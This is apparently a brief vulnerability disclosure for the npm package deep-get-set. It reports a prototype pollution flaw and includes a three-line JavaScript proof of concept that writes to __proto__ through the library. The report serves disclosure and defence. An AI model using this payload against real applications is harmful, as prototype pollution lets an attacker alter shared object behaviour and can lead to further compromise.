Prototype Pollution in acstll/deep-get-set

Valid

Reported on

Sep 8th 2020


Description

deep-set-get is a Set and get values on objects via dot-notation strings. This package is vulnerable to prototype pollution.

POC

const deep = require('deep-get-set');
deep({},['__proto__','polluted'],true);
console.log(polluted);
to join this conversation